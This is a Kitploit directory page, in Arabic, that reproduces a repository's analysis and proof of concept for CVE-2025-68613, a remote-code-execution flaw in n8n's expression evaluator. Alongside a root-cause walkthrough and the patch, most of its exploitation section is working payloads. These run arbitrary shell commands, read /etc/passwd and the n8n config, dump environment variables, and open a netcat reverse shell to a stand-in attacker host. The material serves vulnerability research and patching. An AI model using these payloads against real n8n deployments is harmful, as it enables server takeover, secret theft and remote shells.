Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68613-poc-via-copilot — تحليل فني مفصل وإثبات مفهوم لـ CVE-2025-68613، ثغرة RCE حرجة في تقييم التعبير في n8n عبر تجاوز سياق IIFE this. يتضمن تحليل السبب الجذري ونواقل الاستغلال وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/intbjw/cve-2025-68613-poc-via-copilot
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHubintbjw/cve-2025-68613-poc-via-copilot

CVE-2025-68613-poc-via-copilot

تحليل فني مفصل وإثبات مفهوم لـ CVE-2025-68613، ثغرة RCE حرجة في تقييم التعبير في n8n عبر تجاوز سياق IIFE this. يتضمن تحليل السبب الجذري ونواقل الاستغلال وإرشادات التخفيف.

عرض المستودع
11منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

✅ CVE-2025-68613 تحليل كامل لثغرة حقن التعبيرات في n8n RCE

التاريخ: 23 ديسمبر 2024
الحالة: ✅ تم التحقق من نجاح RCE بالكامل
درجة CVSS: 10.0 (حرجة)


🎉 حمولة RCE الناجحة

{
	{
		(function () {
			var require = this.process.mainModule.require;
			var {execSync} = require('child_process');
			return execSync('id', {encoding: 'utf8'}).trim();
		})()
	}
}

نتيجة التنفيذ: تم إرجاع معلومات مستخدم النظام بنجاح (مثل uid=1000(n8n) gid=1000(n8n) groups=1000(n8n))


🔍 تحليل عميق لمبدأ الثغرة

الثغرة الأساسية: سياق this في الدالة الفورية (IIFE) لم يتم تعقيمه

1. عملية تقييم التعبير

إدخال المستخدم
  ↓
{{ (function() { ... })() }}
  ↓
Expression.resolveSimpleParameterValue()
  ↓
إنشاء كائن سياق data
  ↓
data.process = مرجع كائن process الحقيقي
  ↓
Tournament.execute(expression, data)
  ↓
FunctionEvaluator.evaluate()
  ↓
fn.call(data, errorHandler)  ← ⚠️ المفتاح: this = data
  ↓
تنفيذ الدالة الفورية
  ↓
this.process.mainModule.require ← ⚠️ الوصول إلى require الحقيقي
  ↓
تحميل وحدة child_process
  ↓
execSync('id') ← 🔥 RCE كامل!

2. مواقع الكود الرئيسية

الموقع 1: إنشاء سياق البيانات

الملف: packages/workflow/src/expression.ts
الدالة: Expression.resolveSimpleParameterValue()
الأسطر: حوالي 230-290

// إنشاء وكيل البيانات
const dataProxy = new WorkflowDataProxy(
	this.workflow,
	runExecutionData,
	runIndex,
	itemIndex,
	activeNodeName,
	connectionInputData,
	siblingParameters,
	mode,
	additionalKeys,
	executeData,
	-1,
	selfData,
	contextNodeName,
);
const data = dataProxy.getDataProxy();

// ⚠️ نقطة الثغرة 1: إضافة كائن process إلى data
data.process =
	typeof process !== 'undefined'
		? {
			arch: process.arch,
			env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE === 'true' ? {} : process.env,
			platform: process.platform,
			pid: process.pid,
			ppid: process.ppid,
			release: process.release,
			version: process.pid,
			versions: process.versions,
		}
		: {};

// ⚠️ المشكلة: على الرغم من عرض بعض الخصائص فقط، إلا أنه يتم تمرير مرجع كائن
// لا يزال من الممكن الوصول إلى كائن process الفعلي عبر سلسلة النماذج الأولية أو وسائل أخرى
الموقع 2: تقييم Tournament

الملف: node_modules/@n8n/tournament/src/FunctionEvaluator.ts

evaluate(expr
:
string, data
:
unknown
):
ReturnValue
{
	const fn = this.getFunction(expr);
	// ⚠️ نقطة الثغرة 2: تمرير data كـ this
	return fn.call(data, this.instance.errorHandler);
}

private
getFunction(expr
:
string
):
Function
{
	if (expr in this._codeCache) {
		return this._codeCache[expr];
	}
	const [code] = this.instance.getExpressionCode(expr);
	// ⚠️ نقطة الثغرة 3: استخدام new Function لإنشاء الدالة
	const func = new Function('E', code + ';');
	this._codeCache[expr] = func;
	return func;
}
الموقع 3: غياب تعقيم this

الملف: packages/workflow/src/expression-sandboxing.ts

قبل الإصدار v1.122.0:

// ❌ لا يوجد FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
	before: [],  // ← مصفوفة فارغة، لا تعقيم this
	after: [PrototypeSanitizer, DollarSignValidator],
});

بعد الإصدار v1.122.0:

// ✅ تمت إضافة FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
	before: [FunctionThisSanitizer],  // ← خطاف جديد
	after: [PrototypeSanitizer, DollarSignValidator],
});

// تنفيذ FunctionThisSanitizer
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
	astVisit(ast, {
		visitFunction(path) {
			// إعادة كتابة جميع تعابير الدوال، ربط this بكائن آمن صراحة
			const safeThis = b.objectExpression([
				b.property('init', b.identifier('process'), b.objectExpression([]))
			]);
			// تحويل function() { ... } إلى function() { ... }.bind({ process: {} })
		}
	});
};
الموقع 4: قائمة سوداء غير كاملة للخصائص

الملف: packages/workflow/src/utils.ts
الدالة: isSafeObjectProperty()

قبل الإصدار v1.122.0:

const unsafeObjectProperties = new Set([
	'__proto__',
	'prototype',
	'constructor',
	'getPrototypeOf'
]);
// ❌ مفقود mainModule, binding, _load

بعد الإصدار v1.122.0:

const unsafeObjectProperties = new Set([
	'__proto__',
	'prototype',
	'constructor',
	'getPrototypeOf',
	'mainModule',    // ✅ جديد
	'binding',       // ✅ جديد
	'_load'          // ✅ جديد
]);

💣 تقنيات الاستغلال الكاملة

1. RCE أساسي

{
	{
		(function () {
			var require = this.process.mainModule.require;
			var {execSync} = require('child_process');
			return execSync('id', {encoding: 'utf8'}).trim();
		})()
	}
}

2. تنفيذ أوامر عشوائية

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('whoami', {encoding: 'utf8'}).trim();
		})()
	}
}

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('pwd', {encoding: 'utf8'}).trim();
		})()
	}
}

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('uname -a', {encoding: 'utf8'}).trim();
		})()
	}
}

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('ls -la /', {encoding: 'utf8'});
		})()
	}
}

3. الوصول إلى نظام الملفات

// قراءة ملفات حساسة
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readFileSync('/etc/passwd', 'utf8');
		})()
	}
}

// سرد الدليل
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readdirSync('/').join('\n');
		})()
	}
}

// قراءة تكوين n8n
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readFileSync('./.n8n/config', 'utf8');
		})()
	}
}

// سرد الدليل الحالي
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readdirSync('.').join('\n');
		})()
	}
}

4. تسريب كامل لمتغيرات البيئة (بالاشتراك مع الاكتشافات السابقة)

// الوصول المباشر عبر this.process
{
	{
		(function () {
			return JSON.stringify(this.process.env);
		})()
	}
}

// أو باستخدام الطريقة المتاحة المعروفة
{
	{
		JSON.stringify(process.env)
	}
}

5. الوصول إلى الشبكة (التحضير لـ Reverse Shell)

// التحقق من أدوات الشبكة
{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('which nc', {encoding: 'utf8'}).trim();
		})()
	}
}

// الحصول على واجهات الشبكة
{
	{
		(function () {
			var os = this.process.mainModule.require('os');
			return JSON.stringify(os.networkInterfaces());
		})()
	}
}

// Reverse Shell (⚠️ خطير! للاختبار المصرح به فقط)
{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('nc -e /bin/sh attacker-ip 4444', {encoding: 'utf8'});
		})()
	}
}

📊 ملخص نتائج التحقق من الثغرة

✅ ناقلات هجوم قابلة للاستغلال مؤكدة

#نوع الهجومالحمولةالحالةCVSS
1تسريب متغيرات البيئة{{ Object.keys(process.env) }}✅ نجاح8.5
2تجاوز Constructor{{ [][constructor] }}✅ نجاح8.0
3دالة Function المُنشئة{{ [][constructor][constructor] }}✅ نجاح8.5
4تنفيذ الكود{{ [][constructor][constructor]('return 1+1')() }}✅ نجاح9.0
5RCE كامل{{ (function() { this.process.mainModule.require... })() }}✅ نجاح10.0

❌ هجمات تم إيقافها (في اختبارك)

تنزيل الأداة